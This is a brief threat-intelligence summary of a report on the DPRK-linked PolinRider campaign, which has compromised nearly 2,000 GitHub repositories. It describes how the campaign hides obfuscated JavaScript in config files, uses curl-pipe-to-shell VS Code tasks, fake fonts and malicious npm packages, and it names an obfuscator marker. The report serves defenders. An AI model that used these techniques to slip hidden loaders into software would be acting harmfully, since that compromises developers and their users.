Open Source Malware reports that the DPRK-linked PolinRider supply-chain campaign expanded from 675 to 1,951 confirmed compromised GitHub repositories across 1,047 owners in five weeks. The campaign injects obfuscated JavaScript into developer configuration files and now overlaps operationally with TasksJacker techniques, including malicious .vscode/tasks.json curl-pipe-to-shell payloads, fake font files, malicious npm packages, and weaponized take-home coding tests. The research identifies a new obfuscator variant using the Cot%3t=shtP marker and MDy decoder function, alongside continued use of blockchain-based C2 patterns and newly discovered C2 subdomains. The findings matter for defenders because GitHub search caps, forks, deleted repositories, and non-default branches likely make the measured victim count a floor rather than the full scope.